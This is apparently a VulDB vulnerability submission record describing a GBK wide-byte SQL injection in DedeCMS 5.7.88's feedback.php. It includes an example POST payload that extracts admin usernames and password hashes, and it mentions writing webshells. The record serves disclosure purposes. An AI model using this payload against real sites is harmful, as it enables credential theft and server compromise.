| 标题 | DedeCMS DedeCMS Content Management System V5.7.88 SQL Injection (GBK Wide Byte Bypass) |
|---|
| 描述 | A critical SQL Injection vulnerability exists in the feedback.php and bookfeedback.php components of DedeCMS, affecting versions: V5.7 .88. The vulnerability is located in the comment and reply functions, where the user-controlled $msg parameter (from POST requests) is only processed by the TrimMsg() function, which internally uses addslashes() for escaping. In a GBK-encoded environment, attackers can bypass addslashes() escaping by constructing wide-byte characters (e.g., 0xdf27, which is %df'), allowing arbitrary SQL statements to be injected into the INSERT query. Additionally, the $arctitle variable, which is also escaped with addslashes() before being concatenated into the SQL statement, poses a secondary injection risk.
Example payloads (POST request):
1. Basic SQL Injection to extract admin credentials:
POST /plus/feedback.php
Parameter: msg=%df' UNION SELECT 1,2,admin,pwd,5,6,7,8,9,10,11,12,13 FROM dede_admin-- -
Successful exploitation allows unauthenticated remote attackers to steal administrator account credentials (including MD5-hashed passwords), tamper with database content, and even write webshells via the INTO OUTFILE command, posing a critical threat to server security. This vulnerability is fully exploitable without complex bypass techniques in GBK-encoded environments.
Vulnerability code location: feedback.php lines 251-253 (INSERT statement concatenation) and line 270 (reply mode), where user input is directly concatenated into SQL queries without proper parameterization. |
|---|
| 用户 | R21Z20 (UID 97129) |
|---|
| 提交 | 2026-05-14 07時24分 (23 日前) |
|---|
| 管理 | 2026-06-02 13時30分 (19 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 367913 [DedeCMS 5.7.88 Feedback /plus/feedback.php TrimMsg msg SQL注入] |
|---|
| 积分 | 17 |
|---|